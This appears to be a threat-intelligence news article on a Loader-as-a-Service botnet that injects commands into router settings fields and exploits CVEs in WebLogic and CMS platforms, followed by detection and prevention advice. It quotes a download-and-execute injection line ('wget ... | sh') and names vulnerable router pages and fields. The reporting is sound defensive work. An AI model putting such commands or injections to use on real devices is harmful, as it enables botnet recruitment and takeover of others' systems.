CloudSEK has uncovered a sophisticated Loader-as-a-Service botnet campaign spanning the last six months, leveraging exposed command-and-control logs to orchestrate attacks against SOHO routers, embedded Linux devices, and enterprise applications.
The threat actors exploit unsanitized POST parameters—such as NTP, syslog, and hostname fields—alongside default credentials and known CVEs in WebLogic, WordPress, and vBulletin systems to achieve remote code execution.
Between July and August 2025, attack volume surged by 230%, delivering multi-architecture malware including Morte binaries and cryptomining payloads.
CloudSEK continues to monitor the operation and has alerted impacted customers whose tech stacks match targeted vectors.
CloudSEK’s TRIAD team first identified the operation during routine scans for malicious infrastructure.
The server contained command and control logs issued by threat actors over the period of the last 6months, which gave us insights about their attack vectors and infrastructure in use.
Investigation of the exposed control panel logs revealed a methodical sequence of modules, each corresponding to a stage in the attack chain. The key log markers in square brackets denote distinct functions:
[ReplyPageLogin] captures login attempts against web-admin interfaces, logging both default-credential probes and brute-force sprays.
Successful authentication feeds into subsequent injection stages.
[ConfigSystemCommand] and [SystemCommand] record injection commands such as wget -qO- http://IP/rondo.*.sh | sh, busybox fetches, or TFTP/FTP-based chains, indicating delivery of minimal dropper scripts.
[ReplyErrorPage] and [ReplySuccessPage] signal execution failures or confirmations, guiding the operator’s retry logic or flagging compromised hosts for payload staging.
[ReplyDeviceInfo] logs post-exploit reconnaissance, collecting MAC addresses, firmware versions, and reachable services to tailor payload selection—whether for sustained C2, cryptomining, or resale of access.
The campaign systematically targets:
- Oracle WebLogic servers via console/servlet RCE.
- SOHO routers through vulnerable UI pages (e.g., wlwps.htm, wan_dyna.html) and unsanitized fields (ntp, remote_syslog, hostname, ping).
- Embedded Linux devices by dropping multi-architecture binaries (morte.x86, morte.x86_64).
- CMS platforms via CVE-2019-17574 (Popup Maker), CVE-2019-16759 (WordPress), and vBulletin CVE-2012-1823.
Attackers employ multiple protocols for payload delivery—HTTP, TFTP, FTP—with BusyBox wrappers to maximize compatibility across device types.
Default credentials and automated sprays facilitate initial access. Redundant drop hosts spanning diverse IP ranges ensure resilience against takedowns.
Post-compromise, operators deploy JSON-RPC miners or Mirai-style bots, leveraging hijacked resources for cryptomining and DDoS campaigns.
Enterprise Targeting: The inclusion of WebLogic deserialization, Struts2 OGNL injection, and JNDI exploits elevates risk for data exfiltration, lateral network movement, and secondary payloads such as ransomware.
Infrastructure Compromise: Corporate edge routers face bandwidth exhaustion, time-sensitive system disruption via NTP poisoning, and DNS manipulation through diagnostic interfaces.
Third-Party Risk: Small business routers and IoT devices serve as beachheads for attacks against enterprise clients, while compromised service-provider infrastructure can amplify reach.
Operational impacts include degraded network performance from botnet recruitment, increased incident response workload from multi-vector attacks, and greater demand for threat hunting across diverse surfaces.
- Egress Blocking: Deny outbound HTTP, HTTPS, TFTP, and FTP from IoT segments.
- Inventory & Isolation: Identify internet-exposed admin UIs; isolate devices showing injected POST patterns.
- Credential & Firmware Updates: Enforce unique credentials; apply vendor patches; disable remote management features if unnecessary.
Detection (SOC/SIEM)
- Implement Sigma rules to detect suspicious POST parameters containing
wget,curl, or|sh. - Deploy Suricata/Snort regex alerts for download-and-execute patterns in HTTP bodies.
- Monitor for unusual JSON-RPC traffic indicating cryptomining activity.
Prevention (Network/SecOps)
- Enforce strict egress filtering to allow only whitelisted update servers for firmware and NTP.
- Segment IoT and embedded devices from core production networks.
- Harden web UIs behind VPN or jump-box access.
Response (IR)
- Quarantine devices exhibiting outbound mining or unexpected
/tmp/morte.*executions. - Collect forensic artifacts: shell command logs, process trees, and temporary filesystem contents.
- Reimage or replace unpatchable devices to restore integrity.
CloudSEK forecasts continued evolution of this Loader-as-a-Service operation, with expanded device targeting and payload sophistication. Vigilant monitoring, rapid remediation, and layered defense strategies are critical to mitigate this emerging threat.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
